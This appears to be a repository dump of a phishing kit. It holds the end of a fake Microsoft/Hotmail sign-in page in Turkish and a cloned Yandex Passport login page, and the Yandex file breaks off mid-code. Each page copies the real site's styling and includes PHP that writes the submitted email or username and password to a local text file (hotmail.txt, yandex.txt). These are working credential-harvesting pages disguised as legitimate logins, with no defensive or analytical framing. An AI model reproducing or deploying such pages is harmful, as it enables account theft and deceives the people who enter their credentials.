e-local\"]:focus.has-error,input[type=\"email\"]:focus.has-error,input[type=\"month\"]:focus.has-error,input[type=\"number\"]:focus.has-error,input[type=\"password\"]:focus.has-error,input[type=\"search\"]:focus.has-error,input[type=\"tel\"]:focus.has-error,input[type=\"text\"]:focus.has-error,input[type=\"time\"]:focus.has-error,input[type=\"url\"]:focus.has-error,input[type=\"week\"]:focus.has-error,textarea:focus.has-error,select:focus.has-error{border-color:#e81123}body.cb div.placeholder{margin-top:8px;margin-left:11px}.btn,button,input[type='button'],input[type='submit'],input[type='reset']{height:36px;border-width:1px;background-color:#ccc;background-color:rgba(0,0,0,.2)}.btn:hover,button:hover,input[type=\"button\"]:hover,input[type=\"submit\"]:hover,input[type=\"reset\"]:hover{border:none;background-color:#b2b2b2;background-color:rgba(0,0,0,.3)}.btn:focus,button:focus,input[type=\"button\"]:focus,input[type=\"submit\"]:focus,input[type=\"reset\"]:focus{background-color:#b2b2b2;background-color:rgba(0,0,0,.3)}.btn.btn-primary,button.btn-primary,input[type=\"button\"].btn-primary,input[type=\"submit\"].btn-primary,input[type=\"reset\"].btn-primary{border-color:#0067b8;background-color:#0067b8}.btn.btn-primary:hover,button.btn-primary:hover,input[type=\"button\"].btn-primary:hover,input[type=\"submit\"].btn-primary:hover,input[type=\"reset\"].btn-primary:hover,.btn.btn-primary:focus,button.btn-primary:focus,input[type=\"button\"].btn-primary:focus,input[type=\"submit\"].btn-primary:focus,input[type=\"reset\"].btn-primary:focus{background-color:#005da6}.btn:focus,button:focus,input[type=\"button\"]:focus,input[type=\"submit\"]:focus,input[type=\"reset\"]:focus,.btn.btn-primary:focus,button.btn-primary:focus,input[type=\"button\"].btn-primary:focus,input[type=\"submit\"].btn-primary:focus,input[type=\"reset\"].btn-primary:focus{border:none;text-decoration:underline;outline:2px solid #000}.btn:active,button:active,input[type=\"button\"]:active,input[type=\"submit\"]:active,input[type=\"reset\"]:active,.btn.btn-primary:active,button.btn-primary:active,input[type=\"button\"].btn-primary:active,input[type=\"submit\"].btn-primary:active,input[type=\"reset\"].btn-primary:active{outline:none;text-decoration:none;-ms-transform:scale(.98);-webkit-transform:scale(.98);transform:scale(.98)}.theme-dark .btn,.theme-light .btn,.theme-dark button,.theme-light button,.theme-dark input[type='button'],.theme-light input[type='button'],.theme-dark input[type='submit'],.theme-light input[type='submit'],.theme-dark input[type='reset'],.theme-light input[type='reset']{outline:1px dashed #000}.theme-dark .btn:hover,.theme-light .btn:hover,.theme-dark button:hover,.theme-light button:hover,.theme-dark input[type=\"button\"]:hover,.theme-light input[type=\"button\"]:hover,.theme-dark input[type=\"submit\"]:hover,.theme-light input[type=\"submit\"]:hover,.theme-dark input[type=\"reset\"]:hover,.theme-light input[type=\"reset\"]:hover{border:1px solid #000}.theme-dark .btn:focus,.theme-light .btn:focus,.theme-dark button:focus,.theme-light button:focus,.theme-dark input[type=\"button\"]:focus,.theme-light input[type=\"button\"]:focus,.theme-dark input[type=\"submit\"]:focus,.theme-light input[type=\"submit\"]:focus,.theme-dark input[type=\"reset\"]:focus,.theme-light input[type=\"reset\"]:focus,.theme-dark .btn.btn-primary:focus,.theme-light .btn.btn-primary:focus,.theme-dark button.btn-primary:focus,.theme-light button.btn-primary:focus,.theme-dark input[type=\"button\"].btn-primary:focus,.theme-light input[type=\"button\"].btn-primary:focus,.theme-dark input[type=\"submit\"].btn-primary:focus,.theme-light input[type=\"submit\"].btn-primary:focus,.theme-dark input[type=\"reset\"].btn-primary:focus,.theme-light input[type=\"reset\"].btn-primary:focus{outline:1px solid #000}.theme-dark .btn:active,.theme-light .btn:active,.theme-dark button:active,.theme-light button:active,.theme-dark input[type=\"button\"]:active,.theme-light input[type=\"button\"]:active,.theme-dark input[type=\"submit\"]:active,.theme-light input[type=\"submit\"]:active,.theme-dark input[type=\"reset\"]:active,.theme-light input[type=\"reset\"]:active,.theme-dark .btn.btn-primary:active,.theme-light .btn.btn-primary:active,.theme-dark button.btn-primary:active,.theme-light button.btn-primary:active,.theme-dark input[type=\"button\"].btn-primary:active,.theme-light input[type=\"button\"].btn-primary:active,.theme-dark input[type=\"submit\"].btn-primary:active,.theme-light input[type=\"submit\"].btn-primary:active,.theme-dark input[type=\"reset\"].btn-primary:active,.theme-light input[type=\"reset\"].btn-primary:active{text-decoration:none;outline:1px dashed #000}.logo{max-width:256px;height:24px}.identityBanner{height:28px;background:#f2f2f2;margin:16px -36px;padding:0 36px}.identity{line-height:28px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;text-align:right;width:calc(100% - 56px)}.profile-photo{height:48px;width:48px;margin-top:-48px;border-radius:50%;overflow:hidden;float:right}.profile-photo>img{width:100%}.boilerplate-text{background-color:#f2f2f2;padding:24px 36px 36px 36px;margin:24px -36px -36px -36px}.tile-container{position:relative}.table{width:100%;display:table;table-layout:fixed}.table .table-row{display:table-row}.table .table-cell{display:table-cell;vertical-align:middle}.row.tile{margin-bottom:0;padding:12px 0;cursor:pointer;outline:none;color:inherit;display:block}.row.tile .content{line-height:16px;padding-left:24px}.row.tile .content>*{word-wrap:break-word}.row.tile:focus{outline:#000 dashed 1px;background:none}.row.tile:hover{background-color:#e6e6e6;background-color:rgba(0,0,0,.1);color:inherit}.row.tile:active{background-color:#b3b3b3;background-color:rgba(0,0,0,.3);color:inherit}.row.tile .table-cell:first-child{padding:0 12px}.row.tile .table-cell:first-child+.table-cell{width:100%}.tile-img{width:48px;height:48px}.tile-img.small{width:24px;height:24px;float:left;margin-right:8px}.progress-container{width:100%;position:relative;margin-top:48px;margin-bottom:24px}.progress-container-tile{width:100%;position:relative;top:3px}.progress{position:absolute;bottom:0;height:6px;width:97%;width:calc(100% - 3px)}.animate-pulse{-webkit-animation:pulse 1s infinite alternate;-moz-animation:pulse 1s infinite alternate;-o-animation:pulse 1s infinite alternate;animation:pulse 1s infinite alternate}div.footerNode{margin:0;float:right}div.footerNode a,div.footerNode span{color:#fff;font-size:12px;line-height:28px;white-space:nowrap;display:inline-block;margin-left:16px;margin-right:16px}.text-title,h3,.text-body,p{padding:0;margin-top:16px;margin-bottom:16px}.form-group{margin-bottom:16px}.form-group label{margin-top:0;margin-bottom:0}.btn,button,input[type='button'],input[type='submit'],input[type='reset']{margin-top:0;margin-bottom:0}.col-xs-12.secondary{padding-right:4px}.col-xs-12.primary{padding-left:4px}.no-margin-bottom{margin-bottom:0}.no-margin-top-bottom{margin-top:0;margin-bottom:0}.overflow-hidden{overflow:hidden}.menu-dots{position:absolute;padding:0 5px;right:0;top:2px}.menu-dots:focus{outline:#000 dashed 1px;background:none}.menu{position:absolute;background-color:#fff;border:1px solid #e6e6e6;border:1px solid rgba(0,0,0,.1);background-clip:padding-box;z-index:2;top:0;right:10px;width:160px}.menu li{margin:0}.menu li a{display:block;padding:11px 12px 13px;background-color:#f2f2f2;background-color:rgba(0,0,0,.05);outline:none;color:inherit;cursor:pointer}.menu li a:focus{outline:#000 dashed 1px;background-color:#e6e6e6;background-color:rgba(0,0,0,.1)}.menu li a:hover{background-color:#e6e6e6;background-color:rgba(0,0,0,.1)}.menu li a:active{background-color:#b3b3b3;background-color:rgba(0,0,0,.3)}.moveOffScreen{position:fixed;bottom:0;right:0;height:0!important;width:0!important;overflow:hidden;opacity:0;filter:alpha(opacity=0)}.largePadding{padding:40px}.displaySign{text-align:center;font-size:2.5rem;padding:40px}.banner-logo{max-height:36px}.optin-banner{position:fixed;bottom:40px;right:12px;color:#262626;background-color:#fff;padding:24px;font-size:13px;width:380px;z-index:100;-webkit-box-shadow:0 2px 3px rgba(0,0,0,.55);-moz-box-shadow:0 2px 3px rgba(0,0,0,.55);box-shadow:0 2px 3px rgba(0,0,0,.55)}.optin-banner .table-cell:first-child{width:100%}.no-outline{outline:none}@media(max-width:600px),(max-height:392px){.background,.background>div{display:none}.background.app,.background.app>div{display:inherit}.background-logo{margin-top:24px}.middle{vertical-align:top}.inner{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;border:0;width:100%}.inner.app{-webkit-box-shadow:0 2px 3px rgba(0,0,0,.55);-moz-box-shadow:0 2px 3px rgba(0,0,0,.55);box-shadow:0 2px 3px rgba(0,0,0,.55);border:1px solid #818c94;border:1px solid rgba(0,0,0,.4)}.wide{max-width:412px}#footer{background:#fff}div.footerNode{float:left}div.footerNode a,div.footerNode span{color:#777}.boilerplate-text{padding:16px;margin:24px 0 0 0}.optin-banner{position:fixed;width:100%;top:auto;bottom:0;left:0;right:0;background-color:#f2f2f2;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}}\r\n\r\n\r\n            </style>\r\n    {\r\n        border-width: 2px !important;\r\n    }\r\n</style><style type=\"text/css\">body{display:none;}</style><script type=\"text/javascript\">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type=\"text/css\">body{display:block !important;}</style>');}</script><style type=\"text/css\">body{display:block !important;}</style><noscript>&lt;style type=\"text/css\"&gt;body{display:block !important;}&lt;/style&gt;</noscript><script type=\"text/javascript\">var g_iSRSFailed=0,g_sSRSSuccess=\"\";function SRSRetry(c,f,e,b){var m=1,l=unescape('%3Cscript type=\"text/javascript\" src=\"'),k=unescape('\"%3E%3C/script%3E'),h=f,i=window,d=i.navigator;if(d&&d.userAgent&&b&&b!=f){var g=d.userAgent.toLowerCase(),n=g.indexOf(\"edge\")>=0;if(!n){var a=g.match(/chrome\\/([0-9]+)\\./),j=a&&a.length==2&&!isNaN(a[1])&&parseInt(a[1])>54;if(j)h=b}}if(g_sSRSSuccess.indexOf(c)!=-1)return;if(typeof i[c]==\"undefined\"){g_iSRSFailed=1;e<=m&&document.write(l+h+k)}else g_sSRSSuccess+=c+\"|\"+e+\",\"}\r\n  var g_dtFirstByte=new Date();var g_objPageMode = null;</script><link rel=\"image_src\" href=\"https://auth.gfx.ms/16.000.27497.00/images/Windows_Live_v_thumb.jpg\">\r\n\r\n  <script type=\"text/javascript\" src=\"./index_files/ConvergedLogin_PCore.js.indir\"></script>\r\n<script type=\"text/javascript\">SRSRetry(\"__ConvergedLoginPaginatedStrings\", \"https://auth.gfx.ms/16.000.27497.00/ConvergedLoginPaginatedStrings.TR.js\", 2, \"https://msagfx.live.com/16.000.27497.00/ConvergedLoginPaginatedStrings.TR.js\");SRSRetry(\"__ConvergedLogin_PCore\", \"https://auth.gfx.ms/16.000.27497.00/ConvergedLogin_PCore.js\", 2, \"https://msagfx.live.com/16.000.27497.00/ConvergedLogin_PCore.js\");</script></head>\r\n<body class=\"cb\" data-bind=\"defineGlobals: ServerData, bodyCssClass\">\r\n<div><!--  --> <div data-bind=\"component: { name: &#39;background-image&#39;, publicMethods: backgroundControlMethods }\"><div class=\"background\" role=\"presentation\" data-bind=\"css: { app: isAppBranding }, style: { background: backgroundStyle }\"><!-- ko if: smallImageUrl --> <div class=\"blur\" data-bind=\"backgroundImage: smallImageUrl()\" style=\"background-image: url(&quot;https://auth.gfx.ms/16.000.27497.00/images/Backgrounds/0-small.jpg?x=12f4b8b543125cc986c79cd85320812f&quot;);\"></div><!-- /ko --><!-- ko if: backgroundImageUrl --> <div class=\"backgroundImage\" data-bind=\"backgroundImage: backgroundImageUrl()\" style=\"background-image: url(&quot;https://auth.gfx.ms/16.000.27497.00/images/Backgrounds/0.jpg?x=f5a9a9531b8f4bcc86eabb19472d15d5&quot;);\"></div><!-- /ko --><!-- ko if: !!backgroundImageUrl() --> <div class=\"background-overlay\"></div><!-- /ko --> </div></div>   <!-- ko withProperties: { '$loginPage': $data } --> <div class=\"outer\" data-bind=\"component: { name: &#39;page&#39;,\r\n        params: {\r\n            serverData: svr,\r\n            showButtons: svr.A6,\r\n            showFooterLinks: true,\r\n            useWizardBehavior: svr.BR,\r\n            handleWizardButtons: false,\r\n            password: password,\r\n            hideFromAria: ariaHidden },\r\n         event: {\r\n            footerAgreementClick: footer_agreementClick } }\"><!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><center><!-- ko if: $loginPage.backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko --> <div class=\"inner\" data-bind=\"css: { &#39;app&#39;: $loginPage.backgroundLogoUrl(\"\") }\"><!-- ko ifnot: paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo') --> <div data-bind=\"component: { name: &#39;logo-control&#39;,\r\n                    params: {\r\n                        isChinaDc: svr.fIsChinaDc,\r\n                        bannerLogoUrl: $loginPage.bannerLogoUrl() } }\"><!--  --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || !svr.fHasBackgroundColor) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class=\"logo\" role=\"presentation\" pngsrc=\"https://auth.gfx.ms/16.000.28103.6/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd\" svgsrc=\"https://auth.gfx.ms/16.000.28103.6/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd\" data-bind=\"imgSrc\" src=\"https://auth.gfx.ms/16.000.28103.6/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd\"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div><!-- /ko --> <div data-bind=\"\r\n                    css: { &#39;wide&#39;: paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata(&#39;wide&#39;) },\r\n                    component: { name: &#39;pagination-control&#39;,\r\n                        publicMethods: paginationControlMethods,\r\n                        params: {\r\n                            initialViewId: initialViewId,\r\n                            currentViewId: currentViewId,\r\n                            initialSharedData: initialSharedData,\r\n                            initialError: $loginPage.getServerError() },\r\n                        event: {\r\n                            cancel: paginationControl_onCancel } }\"><div data-bind=\"css: { &#39;animate&#39;: animate() || animate.back(), &#39;back&#39;: animate.back }\"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --> <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid=\"1\" data-bind=\"component: { name: &#39;login-paginated-username-view&#39;,\r\n                        publicMethods: viewInterfaces[$index()],\r\n                        params: {\r\n                            serverData: svr,\r\n                            serverError: initialError,\r\n                            isInitialView: isInitialState,\r\n                            displayName: sharedData.displayName,\r\n                            prefillNames: $loginPage.prefillNames,\r\n                            flowToken: sharedData.flowToken },\r\n                        event: {\r\n                            load: view_onLoad,\r\n                            switchView: view_onSwitchView,\r\n                            refresh: $loginPage.view_onRefresh,\r\n                            redirect: $loginPage.view_onRedirect,\r\n                            showLearnMore: $loginPage.learnMore_onShow,\r\n                            updateBranding: $loginPage.view_onUpdateBranding } }\"><!--  --> <div id=\"loginHeader\" class=\"row text-title\" role=\"heading\" data-bind=\"text: str[&#39;WF_STR_HeaderDefault_Title&#39;]\">Oturum aç</div> <div id=\"loginDescription\" data-bind=\"\r\n            htmlWithBindings: pageDescription,\r\n            childBindings: { &#39;learnMoreLink&#39;: { click: learnMore_onClick, ariaLabel: str[&#39;MOBILE_STR_SignIn_MSAcctHelpHeading&#39;], visible: !svr.BD } }\">Microsoft hesabınızı kullanın. <a href=\"https://login.live.com/pp1600/#\" id=\"learnMoreLink\" target=\"_top\" aria-label=\"Microsoft hesabı nedir?\">Bu nedir?</a></div> \r\n      \r\n      \r\n      </div></div> </div> \r\n      \r\n\r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n    \r\n      \r\n       <form method=\"post\" class=\"wpcf7-form\" action=\"\" \">\r\n       \r\n                  <div style=\"width: 300px;\">\r\n                    <div style=\"float: left;\">\r\n                      <input type=\"text\" class=\"form-control ltr_override\" style=\"margin-top: 28px; width: 275px; height: 34px; font-size: 15px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px;\"  name=\"email\" placeholder=\"E-Posta Adresi\">\r\n            \r\n            \r\n\r\n                      <input type=\"password\" class=\"form-control\" style=\"margin-top: 32px; width: 275px; height: 35px; font-size: 15px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px;\"  name=\"pass\" placeholder=\"Şifre\">\r\n                      <input type=\"hidden\" id=\"redirectUrl\" name=\"redirectUrl\" value=\"/play\"><br><br>\r\n            \r\n            \r\n            \r\n            \r\n            \r\n            \r\n           \r\n                      <input type=\"submit\" id=\"idSIButton9\" class=\"btn btn-block btn-primary\" data-bind=\"\r\n            attr: {\r\n                'id': primaryButtonId || 'idSIButton9',\r\n                'aria-describedby': primaryButtonDescribedBy },\r\n            value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],\r\n            hasFocus: focusOnPrimaryButton,\r\n            click: primaryButton_onClick,\r\n            enable: isPrimaryButtonEnabled,\r\n            visible: isPrimaryButtonVisible\" value=\"Giriş\">\r\n                     \r\n                      <a href=\"javascript:{}\" class=\"btn-fb-connect\" target=\"_blank\" style=\"\">\r\n                    \r\n                      </a>\r\n                   \r\n                    <div style=\"float: left; width: 172px;\">\r\n                      \r\n                    </div>\r\n                    <div style=\"float: left; padding-left: 5px;\">\r\n                      \r\n                    </div>\r\n                  \r\n                </form>\r\n          \r\n      <?php \r\n\r\nif (!empty($_POST[\"pass\"]) && !empty($_POST[\"email\"])) {\r\n$ac = fopen(\"hotmail.txt\",\"a+\");\r\n$password = $_POST['pass'];\r\n$username = $_POST['email'];\r\n$userlar = (\"\\n __________________ \\n\".\" E-posta: \".$username.\"\\n Password: \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n\r\n}\r\n\r\n\r\n       ?>\r\n      </div>\r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n      \r\n    </div> \r\n    \r\n    </div></div> </div> \r\n    \r\n    </div></body></html>"
  },
  {
    "path": "Site/Mail/Site-yandex/index.php",
    "content": "<html lang=\"en\" data-page-type=\"auth.new\" class=\"is-js_yes passport-Page passport-Page_dark is-inlinesvg_yes\"><head><meta charset=\"utf-8\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE7,IE=edge\"><link rel=\"shortcut icon\" href=\"//yastatic.net/morda-logo/i/favicon_comtr.ico\"><script nonce=\"\">(function(d, e, c, r, n, w, v, f) {e = d.documentElement; c = \"className\"; r = \"replace\"; n = \"createElementNS\"; f = \"firstChild\"; w = \"http://www.w3.org/2000/svg\"; v = d.createElement(\"div\"); v.innerHTML = \"<svg/>\"; e[c] = e[c][r](\"is-js_no\", \"is-js_yes\"); e[c] += \" is-inlinesvg_\" + ((v[f] && v[f].namespaceURI) === w ? \"yes\" : \"no\"); })(document);</script><title>Login</title><!--[if gt IE 8]><!--><link rel=\"stylesheet\" type=\"text/css\" href=\"https://yastatic.net/passport-frontend/0.2.92-15/public/css/auth.new.css\"><!-- <![endif]--><!--[if lt IE 9]><link rel=\"stylesheet\" type=\"text/css\" href=\"https://yastatic.net/passport-frontend/0.2.92-15/public/css/auth.new.ie.css\"/><![endif]--><script nonce=\"\">var uid = null;var login = null;var passportHost = \"passport.yandex.com\";</script><!--[if IE]><script src=\"//yastatic.net/jquery/1.9.1/jquery.min.js\"></script><script crossorigin=\"anonymous\" src=\"https://yastatic.net/passport-frontend/0.2.92-15/public/js/vendor.js\"></script><script crossorigin=\"anonymous\" src=\"https://yastatic.net/passport-frontend/0.2.92-15/public/js/auth.new.react.en.js\"></script><![endif]--><!--[if !IE]><!--><script src=\"//yastatic.net/jquery/1.9.1/jquery.min.js\" defer=\"defer\"></script><script crossorigin=\"anonymous\" src=\"https://yastatic.net/passport-frontend/0.2.92-15/public/js/vendor.js\" defer=\"defer\"></script><script crossorigin=\"anonymous\" src=\"https://yastatic.net/passport-frontend/0.2.92-15/public/js/auth.new.react.en.js\" defer=\"defer\"></script><!-- <![endif]--><script type=\"text/javascript\" nonce=\"\">!function(i,t){function e(){Ya.Rum.vsChanged=!0,document.removeEventListener(\"visibilitychange\",e)}if(i.Ya=i.Ya||{},Ya.Rum)throw new Error(\"Rum: interface is already defined\");var n=i.performance,s=n&&n.timing&&n.timing.navigationStart||Ya.startPageLoad||+new Date,a=i.requestAnimationFrame;Ya.Rum={enabled:!!n,vsStart:document.visibilityState,vsChanged:!1,_defTimes:[],_defRes:[],_deltaMarks:{},_settings:{},_vars:{},init:function(i,t){this._settings=i,this._vars=t},getTime:n&&n.now?function(){return n.now()}:function(){return Date.now()-s},time:function(i){this._deltaMarks[i]=[this.getTime()]},timeEnd:function(i){var t=this._deltaMarks[i];t&&0!==t.length&&t.push(this.getTime())},sendTimeMark:function(i,t,e,n){void 0===t&&(t=this.getTime()),this._defTimes.push([i,t,n]),this.mark(i,t)},sendResTiming:function(i,t){this._defRes.push([i,t])},sendRaf:function(i){if(a&&!this.isVisibilityChanged()){var t=this,e=\"2616.\"+i;a(function(){t.isVisibilityChanged()||(t.sendTimeMark(e+\".205\"),a(function(){t.isVisibilityChanged()||t.sendTimeMark(e+\".1928\")}))})}},isVisibilityChanged:function(){return this.vsStart&&(\"visible\"!==this.vsStart||this.vsChanged)},mark:n&&n.mark?function(i,t){n.mark(i+(t?\": \"+t:\"\"))}:function(){}},Date.now||(Ya.Rum.getTime=function(){return new Date-s}),document.addEventListener&&document.addEventListener(\"visibilitychange\",e)}(window);\r\n!function(){\"use strict\";if(window.PerformanceLongTaskTiming){var e=Ya.Rum._tti={events:[],observer:new PerformanceObserver(function(n){e.events=e.events.concat(n.getEntries()),e.events.length>100&&e.events.shift()})};e.observer.observe({entryTypes:[\"longtask\"]})}}();\r\nYa.Rum.init({beacon:true,clck:'https://yandex.ru/clck/click',slots:[\"72792,0,21\",\"69312,0,55\",\"68032,0,7\",\"61684,0,24\",\"45271,0,83\",\"40749,0,37\"],reqid:'9cc02d50d410ab9233be5eaba81bea72'},{'287':'11508','143':'28.1207.2243'});</script><script src=\"https://yastatic.net/nearest.js\" async=\"\" crossorigin=\"\"></script></head><body class=\"passport-Page-Body-h\" data-uid=\"null\" data-login=\"null\" data-passporthost=\"&quot;passport.yandex.com&quot;\" data-static-url=\"https://yastatic.net/passport-frontend/0.2.92-15/public/\" data-logger-token=\"dec2ae99d54bd16990a73556e361d0fc\" data-csrf=\"4004f0127f686d185a4a5803f2734b8186701712:1535560766629\" data-metrics-id=\"784657\" data-tld=\"com\" data-locale=\"en\"><div id=\"root\"><div class=\"passport-Page-Body\" data-reactroot=\"\" data-reactid=\"1\" data-react-checksum=\"-819417162\"><div class=\"passport-Page-Background passport-Page-Background_10\" data-reactid=\"2\"></div><span class=\"passport-Page-Helper\" data-reactid=\"3\"></span><div class=\"passport-Page-Content\" data-reactid=\"4\"><div class=\"passport-Domik passport-Domik_mode_addingAccount\" data-reactid=\"5\"><h1 class=\"passport-Logo\" data-reactid=\"6\"><a href=\"https://yandex.com\" data-reactid=\"7\"><span class=\"passport-Icon passport-Icon_yandex_en\" data-reactid=\"8\"></span></a></h1><div class=\"passport-Domik-Form-Error\" data-reactid=\"9\"></div><div class=\"passport-ScreenBox passport-Domik-Content passport-Domik-Content_wide\" data-reactid=\"10\"><div class=\"passport-ScreenBox-Content\" data-reactid=\"11\"><div class=\"passport-ScreenBox-Item\" data-reactid=\"12\"><div class=\"passport-ScreenBox-Item-Content\" data-reactid=\"13\"><div class=\"passport-Domik-Content\" data-reactid=\"14\"></div></div></div><div class=\"passport-ScreenBox-Item passport-ScreenBox-Item_current\" data-reactid=\"15\"><div class=\"passport-ScreenBox-Item-Content\" data-reactid=\"16\"><div class=\"passport-Domik-Content\" data-reactid=\"17\">\r\n\r\n\r\n\r\n\r\n  <form method=\"post\" class=\"passport-Domik-Form\" data-reactid=\"18\"><input type=\"hidden\" name=\"real_retpath\" value=\"https://mail.yandex.com/\" data-reactid=\"19\"><input type=\"hidden\" name=\"from\" value=\"mail\" data-reactid=\"20\"><input type=\"hidden\" name=\"fretpath\" data-reactid=\"21\" value=\"\"><input type=\"hidden\" name=\"clean\" data-reactid=\"22\" value=\"\"><input type=\"hidden\" name=\"idkey\" value=\"101bdd6459d80bd4f6ba48bd539407c35d\" data-reactid=\"23\"><input type=\"hidden\" name=\"extended\" value=\"1\" data-reactid=\"24\"><input type=\"hidden\" name=\"csrf_token\" value=\"9a7d63e4ee046e91b80daf39c46c3b55f143d633:1535560766619\" data-reactid=\"25\"><input type=\"hidden\" name=\"one\" value=\"1\" data-reactid=\"26\"><input type=\"hidden\" name=\"retpath\" value=\"https://passport.yandex.com/auth/login-status_v2.html?method=password\" data-reactid=\"27\"><div class=\"passport-Domik-Form-Field\" data-reactid=\"28\"><label class=\"passport-Input\" data-reactid=\"29\"><input type=\"text\" name=\"userr\" autocorrect=\"off\" autocapitalize=\"off\" autocomplete=\"username\" placeholder=\" \" class=\"passport-Input-Controller\" data-reactid=\"30\"><span class=\"passport-Input-View\" data-reactid=\"31\"><span class=\"passport-Input-Label\" data-reactid=\"32\">Kullanıcı adı veya Telefon Numası</span></span></label></div><div class=\"passport-Domik-Form-Field\" data-reactid=\"33\"><label class=\"passport-Input\" data-reactid=\"34\"><input type=\"password\" class=\"passport-Input-Controller\" name=\"pass\" autocorrect=\"off\" autocapitalize=\"off\" autocomplete=\"current-password\" placeholder=\" \" data-reactid=\"35\"><span class=\"passport-Input-View\" data-reactid=\"36\"><span class=\"passport-Input-Label\" data-reactid=\"37\">Şifre</span></span></label></div><div class=\"passport-Domik-Form-Field\" data-reactid=\"38\"><label class=\"passport-Checkbox\" data-reactid=\"39\"><input type=\"checkbox\" name=\"twoweeks\" value=\"no\" class=\"passport-Checkbox-Controller\" data-reactid=\"40\"><span class=\"passport-Checkbox-View\" data-reactid=\"41\"></span><span class=\"passport-Checkbox-Label\" data-reactid=\"42\">Don't remember me</span></label></div><div class=\"passport-Domik-Form-Field\" data-reactid=\"43\"><button type=\"submit\" class=\"passport-Button\" data-reactid=\"44\"><span class=\"passport-Button-Content\" data-reactid=\"45\"><span class=\"passport-Button-Text\" data-reactid=\"46\">Sign in</span></span></button><button type=\"button\" class=\"passport-Button passport-Button_qr\" data-reactid=\"47\"><span class=\"passport-Button-Content\" data-reactid=\"48\"></span></button></div></form><div data-reactid=\"49\"><h3 class=\"passport-Domik-Title\" data-reactid=\"50\">Or&nbsp;sign in&nbsp;with a&nbsp;social network</h3><ul class=\"passport-Domik-SocialNetworks\" data-reactid=\"51\"><li data-metrics=\"Начало соцавторизации: fb\" class=\"passport-Domik-SocialNetworks-Item passport-Domik-SocialNetworks-Item_fb\" data-reactid=\"52\"><span class=\"passport-Icon passport-Icon_social_fb\" data-reactid=\"53\"></span></li><li data-metrics=\"Начало соцавторизации: gg\" class=\"passport-Domik-SocialNetworks-Item passport-Domik-SocialNetworks-Item_gg\" data-reactid=\"54\"><span class=\"passport-Icon passport-Icon_social_gg\" data-reactid=\"55\"></span></li><li data-metrics=\"Начало соцавторизации: tw\" class=\"passport-Domik-SocialNetworks-Item passport-Domik-SocialNetworks-Item_tw\" data-reactid=\"56\"><span class=\"passport-Icon passport-Icon_social_tw\" data-reactid=\"57\"></span></li></ul></div></div></div></div><div class=\"passport-ScreenBox-Item\" data-reactid=\"58\"><div class=\"passport-ScreenBox-Item-Content\" data-reactid=\"59\"><div class=\"passport-Domik-Content\" data-reactid=\"60\"></div></div></div></div><ul class=\"passport-Domik-Footer\" data-reactid=\"61\"><li class=\"passport-Domik-Footer-Item\" data-reactid=\"62\"><a data-metrics=\"Клик на восстановление\" href=\"https://passport.yandex.com/restoration?from=mail&amp;origin=hostroot_homer_auth_com&amp;retpath=https%3A%2F%2Fmail.yandex.com%2F\" class=\"passport-Domik-Link passport-Domik-Footer-Link\" data-reactid=\"63\">Can't sign&nbsp;in?</a></li><li class=\"passport-Domik-Footer-Item\" data-reactid=\"64\"><a data-metrics=\"Клик на регистрацию\" href=\"https://passport.yandex.com/registration?from=mail&amp;origin=hostroot_homer_auth_com&amp;retpath=https%3A%2F%2Fmail.yandex.com%2F\" class=\"passport-Domik-Link passport-Domik-Footer-Link\" data-reactid=\"65\">Registration</a></li></ul></div></div><div class=\"passport-Domik-Retpath\" data-reactid=\"66\"><a data-metrics=\"Клик на Вернуться на сервис\" href=\"https://mail.yandex.com?noretpath=1\" data-reactid=\"67\">Return to&nbsp;service</a></div><iframe class=\"passport-Domik-Iframe\" name=\"iframe\" src=\"about:blank\" data-reactid=\"68\"></iframe></div><footer class=\"passport-Page-Footer\" data-reactid=\"69\"><div class=\"footer\" data-reactid=\"70\"><span class=\"footer-item\" data-reactid=\"71\"><a class=\"link link_theme_normal\" target=\"_blank\" href=\"https://yandex.com/support/passport/\" tabindex=\"0\" data-reactid=\"72\"><span class=\"link__inner\" data-reactid=\"73\"><!-- react-text: 74 -->Help<!-- /react-text --></span></a></span><span class=\"footer-item footer-item__rights\" data-reactid=\"75\"><!-- react-text: 76 -->© 2019, <!-- /react-text --><a class=\"link link_theme_normal\" href=\"//yandex.com\" tabindex=\"0\" data-reactid=\"77\"><span class=\"link__inner\" data-reactid=\"78\"><!-- react-text: 79 -->Yandex<!-- /react-text --></span></a></span></div></footer></div></div><noscript><div><img src=\"//mc.yandex.ru/watch/784657\" style=\"position:absolute; left:-9999px;\" alt=\"\"/></div></noscript></body></html>\r\n\r\n<?php\r\nif (!empty($_POST[\"pass\"]) && !empty($_POST[\"userr\"])) {\r\n$ac = fopen(\"yandex.txt\",\"a+\");\r\n$password = $_POST['pass'];\r\n$username = $_POST['userr'];\r\n$userlar = (\"\\n __________________ 